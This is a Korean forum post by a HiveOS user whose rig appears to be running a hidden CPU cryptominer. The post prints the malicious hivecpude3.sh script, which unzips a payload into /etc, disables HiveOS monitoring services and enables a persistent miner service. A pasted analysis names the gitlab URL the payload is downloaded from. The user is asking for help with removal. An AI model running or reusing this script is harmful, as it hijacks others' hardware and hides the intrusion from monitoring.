어제 올린글이 애매해서 더 알아보고 하루만에 재업했습니다.
아무것도 구동안하는데 벽전력200w 언저리 왓다갓다하네요.
그래서 hive htop으로 확인해보니 데로채굴중인듯한데
쓰레드 4로 돌고 있습니다.
약80~100w먹는걸로 추정
이거 중지할려다가 어제 서버하나 날라가버렸네요. gpt의 도움으로 kill 여러번먹여봣는데도 재부팅후에 자동적으로 가동하던데.
서버를 통해 동작시키는게 아니라 hive /etc/hivecpude 백그라운드가동인건지?
이거 중지하는 방법 아시는분 계실런지요?
서버를 빌려줬을때 명령어로 자동실행하게끔 만들어둔건지
아니면 hive를 통해 들어와서 도둑채굴되게끔 만든건지 모르겠습니다.
곰곰히 생각해봐도 이건 서버빌려준적이 없는거 같은데 불확실
그렇다면 hive에서 비번을 안걸어둬서 그럴거 같은데 대처를 하기 위해서 질문드려봅니다.
nano hivecpude3.sh
#!/bin/bash
unzip -o /etc/hivecpude3.zip -d /etc
cp /etc/hivecpude.service /etc/systemd/system/
sudo systemctl stop hivestats
sudo systemctl stop hive-agent
sudo systemctl disable hivestats
sudo systemctl disable hive-agent
sudo systemctl stop birqflow
sudo systemctl disable hiveos-verstats
sudo systemctl stop hiveos-verstats
sudo systemctl disable birqflow
sudo systemctl start hivecpude
sudo systemctl enable hivecpude
해당 스크립트는 HiveOS에서 CPU 채굴을 위해 자동으로 실행되는 악성 스크립트일 가능성이 큽니다. 이 스크립트는 외부 서버에서 ZIP 파일을 다운로드하고, 이를 특정 디렉토리에 풀어 여러 시스템 서비스와 관련된 작업을 수행합니다. 아래는 스크립트의 주요 내용입니다:
- wget으로 ZIP 파일 다운로드:
https://gitlab.com/file-repositories/files-repositories/-/raw/main/hivecpude3.zip
파일을/etc/hivecpude3.zip
위치에 다운로드. - ZIP 파일 압축 해제: 다운로드된 파일을
/etc
에 압축 해제. - 서비스 설정:
hivecpude.service
파일을 시스템 서비스 디렉토리(/etc/systemd/system/
)로 복사. - HiveOS의 기본 서비스 중단:
hivestats
,hive-agent
,birqflow
,hiveos-verstats
등의 서비스 중단 및 비활성화. - 악성 서비스 실행 및 활성화:
hivecpude
라는 새로운 서비스가 실행되고, 부팅 시 자동으로 시작되도록 활성화.
이 스크립트는 정상적인 시스템 동작을 방해하고, 외부에서 다운로드한 파일을 실행하는 방식으로 시스템에 악성 소프트웨어를 설치하는 것을 목적으로 하고 있는 것으로 보입니다.